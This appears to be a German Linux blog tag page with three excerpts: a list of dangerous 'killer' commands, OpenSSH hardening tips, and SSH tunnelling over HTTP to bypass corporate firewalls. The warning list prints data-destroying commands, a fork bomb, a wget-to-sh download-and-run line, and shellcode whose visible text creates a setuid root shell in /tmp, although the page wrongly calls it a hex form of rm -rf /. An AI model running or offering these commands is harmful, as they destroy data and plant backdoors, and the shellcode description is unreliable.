Ssh

Top10 Linux Killer Befehle

Top 10 Killer Kommandos - Linux Befehle, die für Ihren Dateien oder sogar Ihr gesamtes Betriebssystem absolut tödlich verlaufen können. Um dieses gefährliche Szenario zu vermeiden, habe hier eine Liste der Top-Ten Linux Killer-Befehle, die Sie unbedingt vermeiden sollten. 1.Code: rm -rf / Dieser Befehl wirkt rekursiv und löscht auf einen Schlag gewaltsam alle Dateien im Root-Verzeichnis. rm-rf / funktioniert allerdings nicht mehr mit den meisten neueren Distributionen. Auch jetzt sind die meisten großen Distributionen (Ubuntu, Fedora, openSUSE, Mandriva) immun dagegen 2.Code: char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″ “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″ “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″ “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″ “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″ “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″ “\x6e\x2f\x73\x68\x00\x2d\x63\x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”; Dies ist die Hex-Version von [rm-rf /] und kann selbst erfahrene Linux-Benutzer täuschen 3.Code: mkfs.ext3 /dev/sda Dieses Kombination formatiert bzw. wiped alle Dateien des Geräts nach dem Befehl mkfs 4.Code: :(){:|:&};: Bekannt als forkbomb, sorgt dieser Befehl dafür, dass das System eine große Anzahl von Prozessen ausführt, solange bis es dann einfriert. Dies kann oft dazu führen, dass die Daten zerstörrt bzw. beschädigt werden 5.Code: any_command > /dev/sda Mit diesem Befehl werden Roh-Daten auf das Block-Gerät geschrieben und kann in der Regel das Dateisystem zerstören, was insgesamt den Verlust von Daten bedeutet. 6.Code: wget http://some\_untrusted\_source -O- | sh

Continue reading

Tutorial: Top 20 OpenSSH Server Security Tipps

OpenSSH ist die Implementierung des SSH-Protokolls. OpenSSH ist für Remote Login empfohlen, das Erstellen von Backups, Remote-File-Transfer per SCP oder SFTP, und vieles mehr. SSH ist ideal, um die Vertraulichkeit und Integrität von Daten zwischen zwei Netzwerken und Systemen austauschen. Allerdings ist der Hauptvorteil Server-Authentifizierung, durch den Einsatz von Public-Key-Kryptographie. Von Zeit zu Zeit gibt es Gerüchte über OpenSSH Zero-Day-Exploit. Hier sind ein paar Dinge, die Sie zu zwicken, um OpenSSH-Server-Sicherheit zu verbessern. Die Default Config Files und der SSH Port /etc/ssh/sshd_config - OpenSSH server configuration file. /etc/ssh/ssh_config - OpenSSH client configuration file. ~/.ssh/ - Users ssh configuration directory. ~/.ssh/authorized_keys or ~/.ssh/authorized_keys - Lists the public keys (RSA or DSA) that can be used to log into the user’s account /etc/nologin - If this file exists, sshd refuses to let anyone except root log in. /etc/hosts.allow and /etc/hosts.deny : Access controls lists that should be enforced by tcp-wrappers are defined here. SSH default port : TCP 22 Tipp Nr. 01: OpenSSH Server Deaktivieren Laptops und Workstationen funktionieren auch ohne OpenSSH-Server. Wenn Sie nicht mit Remote Login und einer Dateiübertragungsfunktionen per SSH arbeiten, deaktivieren und entfernen Sie den sshd-Server. RHEL / Fedora / CentOS Linux-Benutzer deaktivieren und entfernen den openssh-server mit dem yum Befehl:

Continue reading

SSH via HTTP - proxytunnel

SSH via HTTP — proxytunnel Excerpt SSH is a hugely powerful tool for communicating with and manipulating remote machines, and as a result many companies fear it and try to block it. As such, many corporate firewalls block port 22, the port naturally used by SSH. However, few corporations can afford to block ports 80 or 443, the ports designated for http traffic. SSH is a hugely powerful tool for communicating with and manipulating remote machines, and as a result many companies fear it and try to block it. As such, many corporate firewalls block port 22, the port naturally used by SSH. However, few corporations can afford to block ports 80 or 443, the ports designated for http traffic. It is possible to work around these firewalls by configuring SSH to listen on either port 80 or 443. However, this approach is only suitable if you are not already using, or planning to use, port 80 or 443 to serve your websites. There is, however, another option. If you have are running an Apache webserver, you can configure it to act as an HTTP or HTTPS proxy and use it to forward SSH traffic that comes in on ports 80 and 443 to your SSH server.

Continue reading